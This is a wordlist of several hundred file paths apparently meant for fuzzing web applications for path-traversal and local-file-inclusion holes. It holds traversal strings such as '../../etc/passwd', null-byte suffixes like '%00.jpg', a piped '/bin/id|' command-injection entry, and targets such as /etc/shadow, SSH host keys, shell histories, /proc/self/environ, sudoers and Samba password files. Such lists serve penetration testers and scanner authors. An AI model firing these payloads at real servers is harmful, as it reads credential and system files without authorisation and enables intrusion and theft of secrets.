/../../../../../../../../../../../boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../bin/id|
/../../../../pswd
/../../var/www/logs/access_log
/..\../..\../..\../..\../..\../..\../boot.ini
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
/..\..\..\..\..\..\winnt\win.ini
/..\..\\..\..\\..\..\\..\..\\\/etc/passwd
/./././././././././././boot.ini
/./././././././././././etc/passwd
/./././././././././././etc/shadow
/.Xauthority
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
/.bash_history
/.bash_profile
/.bashrc
/.cshrc
/.forward
/.htpasswd
/.logout
/.netrc
/.passwd
/.profile
/.rhosts
/.sh_history
/.shosts
/.ssh/authorized_keys
///////../../../etc/passwd
/D:\Program Files\
/Library/WebServer/Documents/.htaccess
/Library/WebServer/Documents/default.htm
/Library/WebServer/Documents/default.html
/Library/WebServer/Documents/default.php
/Library/WebServer/Documents/index.htm
/Library/WebServer/Documents/index.html
/Library/WebServer/Documents/index.php
/MySQL/data/mysql-bin.index
/MySQL/data/mysql-bin.log
/MySQL/data/mysql.err
/MySQL/data/mysql.log
/MySQL/data/{HOST}.err
/MySQL/my.cnf
/MySQL/my.ini
/NetServer/bin/stable/apache/php.ini
/NetServer\bin\stable\apache\php.ini
/NetServer\bin\stable\apache\php.ini%00
/PHP\php.ini
/PHP\php.ini%00
/PostgreSQL/log/pgadmin.log
/Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\Apache Group\Apache2\conf\httpd.conf%00
/Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache\conf\httpd.conf%00
/Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\access.log%00
/Program Files\Apache Group\Apache\logs\error.log
/Program Files\Apache Group\Apache\logs\error.log%00
/Program Files\xampp\apache\conf\httpd.conf
/Program Files\xampp\apache\conf\httpd.conf%00
/System/Library/WebObjects/Adaptors/Apache2.2/apache.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/opt/apache2/conf/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/Volumes/webBackup/private/etc/httpd/httpd.conf.default%00
/WINDOWS\php.ini
/WINDOWS\php.ini%00
/WINNT\php.ini
/WINNT\php.ini%00
/[JBOSS]/server/default/conf/jboss-minimal.xml
/[JBOSS]/server/default/conf/jboss-service.xml
/[JBOSS]/server/default/conf/jndi.properties
/[JBOSS]/server/default/conf/log4j.xml
/[JBOSS]/server/default/conf/login-config.xml
/[JBOSS]/server/default/conf/server.log.properties
/[JBOSS]/server/default/conf/standardjaws.xml
/[JBOSS]/server/default/conf/standardjboss.xml
/[JBOSS]/server/default/deploy/jboss-logging.xml
/[JBOSS]/server/default/log/boot.log
/[JBOSS]/server/default/log/server.log
/admin/install.php
/apache/conf/httpd.conf
/apache/logs/access.log
/apache/logs/access.log%00
/apache/logs/access_log
/apache/logs/error.log
/apache/logs/error.log%00
/apache/logs/error_log
/apache/php/php.ini
/apache2/logs/access.log
/apache2/logs/access.log%00
/apache2/logs/access_log
/apache2/logs/error.log
/apache2/logs/error.log%00
/apache2/logs/error_log
/apache\php\php.ini
/apache\php\php.ini%00
/bin/php.ini
/bin/php.ini%00
/boot/grub/grub.cfg
/boot/grub/grub.conf
/boot/grub/menu.lst
/config.asp
/core/config.php
/etc/SUSE-release
/etc/X11/xorg.conf
/etc/X11/xorg.conf-vesa
/etc/X11/xorg.conf-vmware
/etc/X11/xorg.conf.BeforeVMwareToolsInstall
/etc/X11/xorg.conf.orig
/etc/adduser.conf
/etc/alias
/etc/aliases
/etc/anacrontab
/etc/apache/access.conf
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/conf/httpd.conf%00
/etc/apache/default-server.conf
/etc/apache/httpd.conf
/etc/apache2.conf
/etc/apache2/apache.conf
/etc/apache2/apache2.conf
/etc/apache2/conf.d/charset
/etc/apache2/conf.d/phpmyadmin.conf
/etc/apache2/conf.d/security
/etc/apache2/conf/httpd.conf
/etc/apache2/conf/httpd.conf%00
/etc/apache2/default-server.conf
/etc/apache2/envvars
/etc/apache2/httpd.conf
/etc/apache2/httpd.conf%00
/etc/apache2/httpd2.conf
/etc/apache2/mods-available/autoindex.conf
/etc/apache2/mods-available/deflate.conf
/etc/apache2/mods-available/dir.conf
/etc/apache2/mods-available/mem_cache.conf
/etc/apache2/mods-available/mime.conf
/etc/apache2/mods-available/proxy.conf
/etc/apache2/mods-available/setenvif.conf
/etc/apache2/mods-available/ssl.conf
/etc/apache2/mods-enabled/alias.conf
/etc/apache2/mods-enabled/deflate.conf
/etc/apache2/mods-enabled/dir.conf
/etc/apache2/mods-enabled/mime.conf
/etc/apache2/mods-enabled/negotiation.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-enabled/status.conf
/etc/apache2/ports.conf
/etc/apache2/sites-available/default
/etc/apache2/sites-available/default-ssl
/etc/apache2/sites-enabled/000-default
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-enabled/default
/etc/apache2/sites-enabled/default-ssl
/etc/apache2/sites-enabled/default-ssl.conf
/etc/apache2/sites-enabled/default.conf
/etc/apache2/ssl-global.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/vhosts.d/default_vhost.include
/etc/apache22/conf/httpd.conf
/etc/apache22/httpd.conf
/etc/apt/apt.conf
/etc/apt/sources.list
/etc/at.allow
/etc/at.deny
/etc/avahi/avahi-daemon.conf
/etc/bash.bashrc
/etc/bash_completion.d/debconf
/etc/bashrc
/etc/bluetooth/input.conf
/etc/bluetooth/main.conf
/etc/bluetooth/network.conf
/etc/bluetooth/rfcomm.conf
/etc/bootptab
/etc/ca-certificates.conf
/etc/ca-certificates.conf.dpkg-old
/etc/casper.conf
/etc/chkrootkit.conf
/etc/chrootUsers
/etc/chrootUsers%00
/etc/chttp.conf
/etc/clamav/clamd.conf
/etc/clamav/freshclam.conf
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/crypttab
/etc/cups/acroread.conf
/etc/cups/cupsd.conf
/etc/cups/cupsd.conf.default
/etc/cups/pdftops.conf
/etc/cups/printers.conf
/etc/cvs-cron.conf
/etc/cvs-pserver.conf
/etc/debconf.conf
/etc/debian_version
/etc/default/grub
/etc/default/passwd
/etc/defaultdomain
/etc/defaultrouter
/etc/deluser.conf
/etc/dhcp/dhclient.conf
/etc/dhcp3/dhclient.conf
/etc/dhcp3/dhcpd.conf
/etc/dns2tcpd.conf
/etc/e2fsck.conf
/etc/esound/esd.conf
/etc/etter.conf
/etc/exports
/etc/fedora-release
/etc/firewall.rules
/etc/foremost.conf
/etc/fstab
/etc/ftpaccess
/etc/ftpchroot
/etc/ftpchroot%00
/etc/ftphosts
/etc/ftphosts%00
/etc/ftpusers
/etc/fuse.conf
/etc/group
/etc/group%00
/etc/group-
/etc/groups
/etc/grub.conf
/etc/hdparm.conf
/etc/host.conf
/etc/hostname
/etc/hostname.bge
/etc/hostname.ce0
/etc/hostname.ce1
/etc/hostname.ce2
/etc/hostname.ce3
/etc/hostname.dcelx0
/etc/hostname.dcelx1
/etc/hostname.dcelx2
/etc/hostname.dcelx3
/etc/hostname.dmfe0
/etc/hostname.dmfe1
/etc/hostname.dmfe2
/etc/hostname.dmfe3
/etc/hostname.dnet0
/etc/hostname.dnet1
/etc/hostname.dnet2
/etc/hostname.dnet3
/etc/hostname.ecn0
/etc/hostname.ecn1
/etc/hostname.ecn2
/etc/hostname.ecn3
/etc/hostname.elx0
/etc/hostname.elx1
/etc/hostname.elx2
/etc/hostname.elx3
/etc/hostname.elxl0
/etc/hostname.elxl1
/etc/hostname.elxl2
/etc/hostname.elxl3
/etc/hostname.eri0
/etc/hostname.eri1
/etc/hostname.eri2
/etc/hostname.eri3
/etc/hostname.ge0
/etc/hostname.ge1
/etc/hostname.ge2
/etc/hostname.ge3
/etc/hostname.hme0
/etc/hostname.hme1
/etc/hostname.hme2
/etc/hostname.hme3
/etc/hostname.ieef0
/etc/hostname.ieef1
/etc/hostname.ieef2
/etc/hostname.ieef3
/etc/hostname.iprb0
/etc/hostname.iprb1
/etc/hostname.iprb2
/etc/hostname.iprb3
/etc/hostname.le0
/etc/hostname.le1
/etc/hostname.le2
/etc/hostname.le3
/etc/hostname.lo
/etc/hostname.pcn0
/etc/hostname.pcn1
/etc/hostname.pcn2
/etc/hostname.pcn3
/etc/hostname.qfe0
/etc/hostname.qfe1
/etc/hostname.qfe2
/etc/hostname.qfe3
/etc/hostname.spwr0
/etc/hostname.spwr1
/etc/hostname.spwr2
/etc/hostname.spwr3
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/hosts.equiv
/etc/http/conf/httpd.conf
/etc/http/conf/httpd.conf%00
/etc/http/httpd.conf
/etc/http/httpd.conf%00
/etc/httpd.conf
/etc/httpd.conf%00
/etc/httpd/access.conf
/etc/httpd/apache.conf
/etc/httpd/apache2.conf
/etc/httpd/conf
/etc/httpd/conf.d
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/squirrelmail.conf
/etc/httpd/conf.d/ssl.conf
/etc/httpd/conf/apache.conf
/etc/httpd/conf/apache2.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf%00
/etc/httpd/extra/httpd-ssl.conf
/etc/httpd/httpd.conf
/etc/httpd/httpd.conf%00
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error.log%00
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log%00
/etc/httpd/mod_php.conf
/etc/httpd/php.ini
/etc/httpd/php.ini%00
/etc/httpd/srm.conf
/etc/inetd.conf
/etc/init.d
/etc/init.d/apache
/etc/init.d/apache2
/etc/inittab
/etc/ipfw.conf
/etc/ipfw.rules
/etc/issue
/etc/issue.net
/etc/kbd/config
/etc/kernel-img.conf
/etc/kernel-pkg.conf
/etc/ld.so.conf
/etc/ldap/ldap.conf
/etc/lighttpd.conf
/etc/lighttpd/lighthttpd.conf
/etc/lilo.conf
/etc/login.defs
/etc/logrotate.conf
/etc/logrotate.d/ftp
/etc/logrotate.d/ftp%00
/etc/logrotate.d/httpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/proftpd%00
/etc/logrotate.d/vsftpd.log
/etc/logrotate.d/vsftpd.log%00
/etc/lsb-release
/etc/ltrace.conf
/etc/mail/access
/etc/mail/sendmail.conf
/etc/mailman/mm_cfg.py
/etc/make.conf
/etc/mandrake-release
/etc/manpath.config
/etc/master.passwd
/etc/miredo-server.conf
/etc/miredo.conf
/etc/miredo/miredo-server.conf
/etc/miredo/miredo.conf
/etc/modprobe.d/vmware-tools.conf
/etc/modules
/etc/modules.conf
/etc/mono/1.0/machine.config
/etc/mono/2.0/machine.config
/etc/mono/2.0/web.config
/etc/mono/config
/etc/motd
/etc/mtab
/etc/mtools.conf
/etc/muddleftpd.com
/etc/muddleftpd/muddleftpd.conf
/etc/muddleftpd/muddleftpd.passwd
/etc/muddleftpd/mudlog
/etc/muddleftpd/mudlogd.conf
/etc/muddleftpd/passwd
/etc/my.cnf
/etc/my.cnf%00
/etc/my.conf
/etc/mysql/conf.d/old_passwords.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf%00
/etc/netconfig
/etc/network/interfaces
/etc/networks
/etc/newsyslog.conf
/etc/nginx.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-available/default
/etc/nginx/sites-enabled/default
/etc/npasswd
/etc/nsswitch.conf
/etc/openldap/ldap.conf
/etc/opt/ipf/ipf.conf
/etc/opt/ipf/ipnat.conf
/etc/os-release
/etc/osxhttpd/osxhttpd.conf
/etc/pam.conf
/etc/pam.d/proftpd
/etc/passwd
/etc/passwd%00
/etc/passwd-
/etc/passwd~
/etc/password.master
/etc/php.d/dom.ini
/etc/php.d/gd.ini
/etc/php.d/imap.ini
/etc/php.d/json.ini
/etc/php.d/ldap.ini
/etc/php.d/mbstring.ini
/etc/php.d/mysql.ini
/etc/php.d/mysqli.ini
/etc/php.d/odbc.ini
/etc/php.d/pdo.ini
/etc/php.d/pdo_mysql.ini
/etc/php.d/pdo_odbc.ini
/etc/php.d/pdo_pgsql.ini
/etc/php.d/pdo_sqlite.ini
/etc/php.d/pgsql.ini
/etc/php.d/xmlreader.ini
/etc/php.d/xmlwriter.ini
/etc/php.d/xsl.ini
/etc/php.d/zip.ini
/etc/php.ini
/etc/php.ini%00
/etc/php/apache/php.ini
/etc/php/apache/php.ini%00
/etc/php/apache2/php.ini
/etc/php/apache2/php.ini%00
/etc/php/cgi/php.ini
/etc/php/cgi/php.ini%00
/etc/php/php.ini
/etc/php/php.ini%00
/etc/php/php4/php.ini
/etc/php/php4/php.ini%00
/etc/php4.4/fcgi/php.ini
/etc/php4.4/fcgi/php.ini%00
/etc/php4/apache/php.ini
/etc/php4/apache/php.ini%00
/etc/php4/apache2/php.ini
/etc/php4/apache2/php.ini%00
/etc/php4/cgi/php.ini
/etc/php4/cgi/php.ini%00
/etc/php5/apache/php.ini
/etc/php5/apache/php.ini%00
/etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini%00
/etc/php5/cgi/php.ini
/etc/php5/cgi/php.ini%00
/etc/phpmyadmin/config.inc.php
/etc/postfix/mydomains
/etc/postgresql/pg_hba.conf
/etc/postgresql/postgresql.conf
/etc/printcap
/etc/profile
/etc/proftp.conf
/etc/proftp.conf%00
/etc/proftpd/modules.conf
/etc/proftpd/modules.conf%00
/etc/proftpd/proftpd.conf
/etc/protpd/proftpd.conf
/etc/protpd/proftpd.conf%00
/etc/pulse/client.conf
/etc/pure-ftpd.conf
/etc/pure-ftpd.conf%00
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf%00
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pure-ftpd.pdb%00
/etc/pure-ftpd/pureftpd.pdb
/etc/pure-ftpd/pureftpd.pdb%00
/etc/pure-ftpd/putreftpd.pdb
/etc/pureftpd.passwd
/etc/pureftpd.passwd%00
/etc/pureftpd.pdb
/etc/pureftpd.pdb%00
/etc/rc.conf
/etc/rc.d/rc.httpd
/etc/redhat-release
/etc/release
/etc/resolv.conf
/etc/resolvconf/update-libc.d/sendmail
/etc/rpc
/etc/samba/dhcp.conf
/etc/samba/netlogon
/etc/samba/private/smbpasswd
/etc/samba/samba.conf
/etc/samba/smb.conf
/etc/samba/smb.conf.user
/etc/samba/smbpasswd
/etc/samba/smbusers
/etc/security/access.conf
/etc/security/environ
/etc/security/environ%00
/etc/security/failedlogin
/etc/security/group
/etc/security/group%00
/etc/security/group.conf
/etc/security/lastlog
/etc/security/limits
/etc/security/limits%00
/etc/security/limits.conf
/etc/security/namespace.conf
/etc/security/opasswd
/etc/security/pam_env.conf
/etc/security/passwd
/etc/security/passwd%00
/etc/security/sepermit.conf
/etc/security/time.conf
/etc/security/user
/etc/security/user%00
/etc/sensors.conf
/etc/sensors3.conf
/etc/shadow
/etc/shadow%00
/etc/shadow-
/etc/shadow~
/etc/slackware-release
/etc/smb.conf
/etc/smbpasswd
/etc/smi.conf
/etc/snmpd.conf
/etc/squirrelmail/apache.conf
/etc/squirrelmail/config.php
/etc/squirrelmail/config/config.php
/etc/squirrelmail/config_default.php
/etc/squirrelmail/config_local.php
/etc/squirrelmail/default_pref
/etc/squirrelmail/filters_setup.php
/etc/squirrelmail/index.php
/etc/squirrelmail/sqspell_config.php
/etc/ssh/ssh_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/ssh/sshd_config
/etc/sso/sso_config.ini
/etc/stunnel/stunnel.conf
/etc/subversion/config
/etc/sudoers
/etc/sw-cp-server/applications.d/00-sso-cpserver.conf
/etc/sw-cp-server/applications.d/plesk.conf
/etc/sysconfig/network
/etc/sysconfig/network-scripts/ifcfg-eth0
/etc/sysctl.conf
/etc/sysctl.d/10-console-messages.conf
/etc/sysctl.d/10-network-security.conf
/etc/sysctl.d/10-process-security.conf
/etc/sysctl.d/wine.sysctl.conf
/etc/syslog.conf
/etc/syslogd.conf
/etc/system
/etc/termcap
/etc/timezone
/etc/tinyproxy/tinyproxy.conf
/etc/tor/tor-tsocks.conf
/etc/tsocks.conf
/etc/updatedb.conf
/etc/updatedb.conf.BeforeVMwareToolsInstall
/etc/utmp
/etc/vfstab
/etc/vhcs2/proftpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf%00
/etc/vmware-tools/config
/etc/vmware-tools/tpvmlp.conf
/etc/vmware-tools/vmware-tools-libraries.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.chroot_list%00
/etc/vsftpd.conf
/etc/vsftpd.conf%00
/etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd.conf%00
/etc/webmin/miniserv.conf
/etc/webmin/miniserv.users
/etc/wicd/dhclient.conf.template.default
/etc/wicd/manager-settings.conf
/etc/wicd/wired-settings.conf
/etc/wicd/wireless-settings.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftpaccess%00
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftphosts%00
/etc/wu-ftpd/ftpusers
/etc/wu-ftpd/ftpusers%00
/home/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/bin/stable/apache/php.ini
/home/postgres/data/PG_VERSION
/home/postgres/data/pg_hba.conf
/home/postgres/data/pg_ident.conf
/home/postgres/data/postgresql.conf
/home/user/lighttpd/lighttpd.conf
/home2/bin/stable/apache/php.ini
/home2\bin\stable\apache\php.ini
/home2\bin\stable\apache\php.ini%00
/home\bin\stable\apache\php.ini
/home\bin\stable\apache\php.ini%00
/http/httpd.conf
/log/miscDir/accesslog
/logs/access.log
/logs/access.log%00
/logs/access_log
/logs/error.log
/logs/error.log%00
/logs/error_log
/logs/pure-ftpd.log
/logs/pure-ftpd.log%00
/logs/security_debug_log
/logs/security_log
/master.passwd
/mysql/bin/my.ini
/opt/[JBOSS]/server/default/conf/jboss-minimal.xml
/opt/[JBOSS]/server/default/conf/jboss-service.xml
/opt/[JBOSS]/server/default/conf/jndi.properties
/opt/[JBOSS]/server/default/conf/log4j.xml
/opt/[JBOSS]/server/default/conf/login-config.xml
/opt/[JBOSS]/server/default/conf/server.log.properties
/opt/[JBOSS]/server/default/conf/standardjaws.xml
/opt/[JBOSS]/server/default/conf/standardjboss.xml
/opt/[JBOSS]/server/default/deploy/jboss-logging.xml
/opt/[JBOSS]/server/default/log/boot.log
/opt/[JBOSS]/server/default/log/server.log
/opt/apache/apache.conf
/opt/apache/apache2.conf
/opt/apache/conf/apache.conf
/opt/apache/conf/apache2.conf
/opt/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf%00
/opt/apache2/apache.conf
/opt/apache2/apache2.conf
/opt/apache2/conf/apache.conf
/opt/apache2/conf/apache2.conf
/opt/apache2/conf/httpd.conf
/opt/apache2/conf/httpd.conf%00
/opt/apache22/conf/httpd.conf
/opt/httpd/apache.conf
/opt/httpd/apache2.conf
/opt/httpd/conf/apache.conf
/opt/httpd/conf/apache2.conf
/opt/lampp/etc/httpd.conf
/opt/lampp/logs/access.log
/opt/lampp/logs/access.log%00
/opt/lampp/logs/access_log
/opt/lampp/logs/access_log%00
/opt/lampp/logs/error.log
/opt/lampp/logs/error.log%00
/opt/lampp/logs/error_log
/opt/lampp/logs/error_log%00
/opt/lsws/conf/httpd_conf.xml
/opt/lsws/logs/access.log
/opt/lsws/logs/error.log
/opt/tomcat/conf/tomcat-users.xml
/opt/tomcat/logs/catalina.err
/opt/tomcat/logs/catalina.out
/opt/xampp/etc/php.ini
/opt/xampp/etc/php.ini%00
/opt/xampp/logs/access.log
/opt/xampp/logs/access.log%00
/opt/xampp/logs/access_log
/opt/xampp/logs/access_log%00
/opt/xampp/logs/error.log
/opt/xampp/logs/error.log%00
/opt/xampp/logs/error_log
/opt/xampp/logs/error_log%00
/php/php.ini
/php4/php.ini
/php4\php.ini
/php4\php.ini%00
/php5/php.ini
/php5\php.ini
/php5\php.ini%00
/php\php.ini
/php\php.ini%00
/private/etc/httpd/apache.conf
/private/etc/httpd/apache2.conf
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf%00
/private/etc/httpd/httpd.conf.default
/private/etc/httpd/httpd.conf.default%00
/private/etc/squirrelmail/config/config.php
/private/tmp/[JBOSS]/server/default/conf/jboss-minimal.xml
/private/tmp/[JBOSS]/server/default/conf/jboss-service.xml
/private/tmp/[JBOSS]/server/default/conf/jndi.properties
/private/tmp/[JBOSS]/server/default/conf/log4j.xml
/private/tmp/[JBOSS]/server/default/conf/login-config.xml
/private/tmp/[JBOSS]/server/default/conf/server.log.properties
/private/tmp/[JBOSS]/server/default/conf/standardjaws.xml
/private/tmp/[JBOSS]/server/default/conf/standardjboss.xml
/private/tmp/[JBOSS]/server/default/deploy/jboss-logging.xml
/private/tmp/[JBOSS]/server/default/log/boot.log
/private/tmp/[JBOSS]/server/default/log/server.log
/proc/cmdline
/proc/cpuinfo
/proc/devices
/proc/filesystems
/proc/interrupts
/proc/ioports
/proc/loadavg
/proc/meminfo
/proc/modules
/proc/mounts
/proc/net/arp
/proc/net/dev
/proc/net/fib_trie
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/partitions
/proc/sched_debug
/proc/self/cmdline
/proc/self/cwd/app.js
/proc/self/cwd/app.py
/proc/self/cwd/index.php
/proc/self/cwd/main.js
/proc/self/cwd/main.py
/proc/self/environ
/proc/self/environ%00
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/10
/proc/self/fd/100
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/2
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/self/fd/255
/proc/self/fd/26
/proc/self/fd/27
/proc/self/fd/28
/proc/self/fd/29
/proc/self/fd/3
/proc/self/fd/30
/proc/self/fd/31
/proc/self/fd/32
/proc/self/fd/33
/proc/self/fd/34
/proc/self/fd/35
/proc/self/fd/35/etc/passwd%00
/proc/self/fd/36
/proc/self/fd/37
/proc/self/fd/38
/proc/self/fd/39
/proc/self/fd/4
/proc/self/fd/40
/proc/self/fd/41
/proc/self/fd/42
/proc/self/fd/43
/proc/self/fd/44
/proc/self/fd/45
/proc/self/fd/46
/proc/self/fd/47
/proc/self/fd/48
/proc/self/fd/49
/proc/self/fd/5
/proc/self/fd/50
/proc/self/fd/51
/proc/self/fd/52
/proc/self/fd/53
/proc/self/fd/54
/proc/self/fd/55
/proc/self/fd/56
/proc/self/fd/57
/proc/self/fd/58
/proc/self/fd/59
/proc/self/fd/6
/proc/self/fd/60
/proc/self/fd/61
/proc/self/fd/62
/proc/self/fd/63
/proc/self/fd/64
/proc/self/fd/65
/proc/self/fd/66
/proc/self/fd/67
/proc/self/fd/68
/proc/self/fd/69
/proc/self/fd/7
/proc/self/fd/70
/proc/self/fd/71
/proc/self/fd/72
/proc/self/fd/73
/proc/self/fd/74
/proc/self/fd/75
/proc/self/fd/76
/proc/self/fd/77
/proc/self/fd/78
/proc/self/fd/79
/proc/self/fd/8
/proc/self/fd/80
/proc/self/fd/81
/proc/self/fd/82
/proc/self/fd/83
/proc/self/fd/84
/proc/self/fd/85
/proc/self/fd/86
/proc/self/fd/87
/proc/self/fd/88
/proc/self/fd/89
/proc/self/fd/9
/proc/self/fd/90
/proc/self/fd/91
/proc/self/fd/92
/proc/self/fd/93
/proc/self/fd/94
/proc/self/fd/95
/proc/self/fd/96
/proc/self/fd/97
/proc/self/fd/98
/proc/self/fd/99
/proc/self/mounts
/proc/self/net/arp
/proc/self/stat
/proc/self/status
/proc/stat
/proc/swaps
/proc/version
/root/.Xauthority
/root/.bash_config
/root/.bash_history
/root/.bash_logout
/root/.bash_logut
/root/.bashrc
/root/.ksh_history
/root/anaconda-ks.cfg
/srv/www/htdos/squirrelmail/config/config.php
/tmp/[JBOSS]/server/default/conf/jboss-minimal.xml
/tmp/[JBOSS]/server/default/conf/jboss-service.xml
/tmp/[JBOSS]/server/default/conf/jndi.properties
/tmp/[JBOSS]/server/default/conf/log4j.xml
/tmp/[JBOSS]/server/default/conf/login-config.xml
/tmp/[JBOSS]/server/default/conf/server.log.properties
/tmp/[JBOSS]/server/default/conf/standardjaws.xml
/tmp/[JBOSS]/server/default/conf/standardjboss.xml
/tmp/[JBOSS]/server/default/deploy/jboss-logging.xml
/tmp/[JBOSS]/server/default/log/boot.log
/tmp/[JBOSS]/server/default/log/server.log
/tmp/access.log
/tmp/sess_<sessid>
/usr/apache/conf/httpd.conf
/usr/apache/conf/httpd.conf%00
/usr/apache2/conf/httpd.conf
/usr/apache2/conf/httpd.conf%00
/usr/etc/pure-ftpd.conf
/usr/etc/pure-ftpd.conf%00
/usr/home/user/lighttpd/lighttpd.conf
/usr/home/user/var/log/apache.log
/usr/home/user/var/log/lighttpd.error.log
/usr/internet/pgsql/data/pg_hba.conf
/usr/internet/pgsql/data/postmaster.log
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php.ini%00
/usr/lib/php/php.ini
/usr/lib/php/php.ini%00
/usr/lib/security/mkuser.default
/usr/lib/security/mkuser.default%00
/usr/local/Zend/etc/php.ini
/usr/local/Zend/etc/php.ini%00
/usr/local/[JBOSS]/server/default/conf/jboss-minimal.xml
/usr/local/[JBOSS]/server/default/conf/jboss-service.xml
/usr/local/[JBOSS]/server/default/conf/jndi.properties
/usr/local/[JBOSS]/server/default/conf/log4j.xml
/usr/local/[JBOSS]/server/default/conf/login-config.xml
/usr/local/[JBOSS]/server/default/conf/server.log.properties
/usr/local/[JBOSS]/server/default/conf/standardjaws.xml
/usr/local/[JBOSS]/server/default/conf/standardjboss.xml
/usr/local/[JBOSS]/server/default/deploy/jboss-logging.xml
/usr/local/[JBOSS]/server/default/log/boot.log
/usr/local/[JBOSS]/server/default/log/server.log
/usr/local/apache/apache.conf
/usr/local/apache/apache2.conf
/usr/local/apache/audit_log
/usr/local/apache/conf/access.conf
/usr/local/apache/conf/apache.conf
/usr/local/apache/conf/apache2.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/httpd.conf%00
/usr/local/apache/conf/httpd.conf.default
/usr/local/apache/conf/modsec.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/php.ini%00
/usr/local/apache/conf/vhosts-custom.conf
/usr/local/apache/conf/vhosts.conf
/usr/local/apache/error.log
/usr/local/apache/error_log
/usr/local/apache/httpd.conf
/usr/local/apache/httpd.conf%00
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access. log
/usr/local/apache/logs/access. log%00
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log%00
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access_ log%00
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log%00
/usr/local/apache/logs/audit_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log%00
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log%00
/usr/local/apache/logs/lighttpd.error.log
/usr/local/apache/logs/lighttpd.log
/usr/local/apache/logs/mod_jk.log
/usr/local/apache1.3/conf/httpd.conf
/usr/local/apache2/apache.conf
/usr/local/apache2/apache2.conf
/usr/local/apache2/conf/apache.conf
/usr/local/apache2/conf/apache2.conf
/usr/local/apache2/conf/extra/httpd-ssl.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf%00
/usr/local/apache2/conf/modsec.conf
/usr/local/apache2/conf/ssl.conf
/usr/local/apache2/conf/vhosts-custom.conf
/usr/local/apache2/conf/vhosts.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/httpd.conf%00
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access.log%00
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access_log%00
